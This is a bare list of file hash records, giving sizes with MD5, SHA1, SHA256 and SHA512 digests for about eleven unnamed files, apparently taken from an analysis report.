SHA512ffbfaab08d1771ebbda371533de04376dab828553df21e2552d85dfb0668a82f62be310595079ecd10f7e3763acf5a3c20a4d8a6434b36e591276fd4183032ae
-
Filesize
4.9MB
MD551e8a5281c2092e45d8c97fbdbf39560
SHA1c499c810ed83aaadce3b267807e593ec6b121211
SHA2562a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA51298b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb
-
Filesize
38KB
MD50f8e4992ca92baaf54cc0b43aaccce21
SHA1c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA5126e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978
-
Filesize
6.6MB
MD55c5602cda7ab8418420f223366fff5db
SHA152f81ee0aef9b6906f7751fd2bbd4953e3f3b798
SHA256e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce
SHA51251c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f
-
Filesize
30KB
MD5bffff83a000baf559f3eb2b599a1b7e8
SHA17f9238bda6d0c7cc5399c6b6ab3b42d21053f467
SHA256bc71fbdfd1441d62dd86d33ff41b35dc3cc34875f625d885c58c8dc000064dab
SHA5123c0ba0cf356a727066ae0d0d6523440a882aafb3ebdf70117993effd61395deebf179948f8c7f5222d59d1ed748c71d9d53782e16bd2f2eccc296f2f8b4fc948
-
Filesize
1.1MB
MD5a1388676824ce6347d31d6c6a7a1d1b5
SHA127dd45a5c9b7e61bb894f13193212c6d5668085b
SHA2562480a78815f619a631210e577e733c9bafecb7f608042e979423c5850ee390ff
SHA51226ea1b33f14f08bb91027e0d35ac03f6203b4dfeee602bb592c5292ab089b27ff6922da2804a9e8a28e47d4351b32cf93445d894f00b4ad6e2d0c35c6c7f1d89
-
Filesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
Filesize
508KB
MD50fc69d380fadbd787403e03a1539a24a
SHA177f067f6d50f1ec97dfed6fae31a9b801632ef17
SHA256641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc
SHA512e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0
-
Filesize
3KB
MD53d5d0c86438025031b22267d956d6845
SHA155adc19e2a366f8ce77a17ccdb6be6437297652f
SHA256396ee975cdf4f8cd071a15571f0b276ce53fd1f3232ed773131af1ebe6ecd15c
SHA5125fe420cb13918033d9bf9467a96286d4aa4280f6755f930a4cfff1f1a8b122169361be16fae62a3e8cc7df18ad95c752198b6f4b627648ea08c23200207be053
-
Filesize
652B
MD5952dd3f22a5460cb9ae7ea1b0f40fe5e
SHA12a3c38dbbc56119b6eecd3829cfa2249d73b450d
SHA2563968164b2db51705319bd89c37c85db5efb0f14e8f7c768577a3aa49df3a62ec
SHA512948bf1c634b25e30fe54f772739f7fcf2c0f2914bf64df941dc41fcd0aa830aaaff1049922d7b40bc1ebe0909bb38bbe3488dd39cd1b1d5845918a3a5ae7b52c
-
Filesize
8KB
MD53ec64336df36ed72f166e00a44a37a50
SHA19c23ba44e14b77ffdda10ce77242662cda1332ec
SHA2564d82960c6086bee4740b780256de103096bbc0ea514d42e0bea60bacde66e556
SHA512cd36c65128cc4a96c0b19c161e8a32557801c013654c18765a34d53e4d246d238f9426ed5d53fc39b2f9dbde883365b301647cd31c60aa2986086b3a69d92587
-
Filesize
369B
MD56ee712419343a94198f911f1dc2b6685
SHA178f72252ee0542df17b79cd356d04fcf4dba32fe
SHA256a514f64161897965e7d5a95497763ca151a9a49736925cb645d166ef0859feb1
SHA512fee0437d0e6427ded91fc7b6ca6060ce06c463a353a800d9dc80a45c68accb47185a16c53394c60f50e13d146b2566ff561cecdaf92fd35854bd8832172f3100